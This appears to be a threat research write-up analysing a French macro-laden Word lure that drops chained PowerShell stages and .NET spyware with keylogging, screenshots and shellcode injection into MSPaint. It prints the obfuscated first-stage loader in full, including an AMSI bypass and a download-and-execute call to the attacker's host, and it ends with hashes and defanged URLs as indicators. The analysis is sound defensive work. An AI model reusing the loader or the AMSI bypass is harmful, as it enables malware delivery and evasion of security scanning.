

We have found an exciting document that hides a whole chain of PS scripts. Unfortunately, the original document has used a coercive lure to make the victim enable macros that drop malicious artifacts. This specific document’s lure is written in French “BIENVENUE DANS WORD Microsoft Word a ete mise a jour avec succes” File Type: Microsoft Windows Document MD5 at InQuest Labs: [ca09b19b6975e090fb4eda6ced1847b1](

French welcome to word message
Image 1: ca09b19b6975e090fb4eda6ced1847b1 document lure

At the time of submission, the document had a relatively low detection rate on [Virustotal]( Over time the detection will increase, but the initial download and analysis is important.

File flagged by 5 vendors as malicious
Image 2: VirusTotal Detection 5/59

If the file is heavily obfuscated, it helps to run it in a virtual environment. To undersstand the basic functionality of a malicous or legitamite file, dynamic analysis through a sandbox indicates this document is loading a Powershell file.

Highlighted URL
Image 3: Downloading PS file

Looking at the contents of the downloaded script. $ cat rHb0lMWD.f2e6a9154ab6cd29b337d6b555367580 $aMsEjutuOSYR=@(102,117,110,99,116,105,111,110,32,109,101,114,116,115,97,10,123,10,32,32,105,96,69,96,120,40,110,101,119,45,111,98,106,101,99,116,32,110,101,116,46,119,101,98,99,108,105,101,110,116,41,46,100,111,119,110,108,111,97,100,83,116,114,105,110,103,40,39,104,116,39,43,39,116,112,58,47,47,115,101,39,43,39,99,117,114,101,46,103,114,97,118,105,39,43,39,111,109,46,102,114,39,43,39,58,56,48,47,102,97,39,43,39,110,100,105,46,112,39,43,39,115,49,39,41,10,125,10,109,101,114,116,115,97);[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);[System.Text.Encoding]::ASCII.GetString($aMsEjutuOSYR)|&('I'+'EX'); The content at the beginning of the script is decoded with this function. iq-terminal functionmertsa§ i`E`є x(nw-objectnet.webclient).downloadString('ht'+'tp://se'+'cure.gravi'+''+':80/fa'+'ndi.p'+'s1')mertsa The above code loads the following script, which starts to get more interesting.

Code screenshot
Image 4: Url of next stage code
Code screenshot
Image 5: Vox.ps1

The script contains a large volume of data after converting it to hex.

Code screenshot
Image 6: Vox to Hex

It is apparent that the data is encoded with BASE64, and the reverse function is implemented. In order to continue the analysis, we must use the reverse function and decode the base64.

Code screenshot
Image 7: Unpacked executable file

Carving out the executable confirms that we are on the right track. File Type: PE32+ executable for MS Windows (GUI) Mono/.Net assembly MD5: BAC7BE7EEBB8670AE624A0179A366148 The executable is written in .NET. It is easy to analyze, considering it is not obfuscated by any means.

Code screenshot
Image 8: .NET executable

The program collects system information to include antivirus products, display information, and the system’s capacity.

Code screenshot
Image 9: Harvest system information

The program then connects to a remote server based on two addresses and several randomized ports.

Code screenshot
Image 10: Connection functionality

The following function connects to a remote server. If the connection fails, the program goes to sleep and tries again later.

Code screenshot
Image 11: C2 Infrastructure
Code screenshot
Image 12: Encryption Key

If the treat actor decides the victim matches their parameters, they download other data, which is also decrypted with the above key. Based on the fact that the data would be launched after decryption, the subsequent download would likely be another executable file.

Code screenshot
Image 13: Self Destruction

Threat actors often take special measures to prevent their payloads from being analyzed, but we got lucky and managed to get the executable file. File Type: PE64+ executable for MS Windows (GUI) Mono/.Net assembly MD5: 0B1D7C043BE8C696D53D63FC0C834195 This executable file is also written in .NET. It collects information about keystrokes and mouse movements. Additional functionality is included to capture screenshots. Special attention is directed to the fact that the program injects shellcode into MSPaint.

Code screenshot
Image 14: Shellcode written to MSPaint

Before the injection and execution of the shellcode, the program applies the byte reverse function.

Code screenshot
Image 15: Reverse byte function

After unpacking, the shellcode looks like this.

Code screenshot
Image 16: Unpacked shellcode

This shellcode is rather interesting. Its purpose is to communicate with a remote server in the “mspaint” address space.

Code screenshot
Image 17: C2 Assembly
Code screenshot
Image 18: C2 address

Targeted attacks still pose a threat to the information security of many organizations. Deep dive analysis of the threats can help to prepare for future attacks.

Debug Strings:

C:\Users\wallstreet\source\repos\WindowsFormsApp3\WindowsFormsApp3\bin\x64\Release\liko.pdb C:\Users\wallstreet\source\repos\Billang\Billang\obj\Release\Billang.pdb


BAC7BE7EEBB8670AE624A0179A366148 F2F34C3AF3D8F3AE5E2A28DBFB87681E 0B1D7C043BE8C696D53D63FC0C834195 ca09b19b6975e090fb4eda6ced1847b hxxp://secure[.]graviom[.]fr[:]80/fandi.ps1 hxxp://secure.graviom[.]fr/update.bin hxxps://raw.githubusercontent[.]com/R3mEm/vox/main/vox.ps1 hxxps://www.4sync[.]com/web/directDownload/QHZsERS6/rHb0lMWD.f2e6a9154ab6cd9b337d6b555367580

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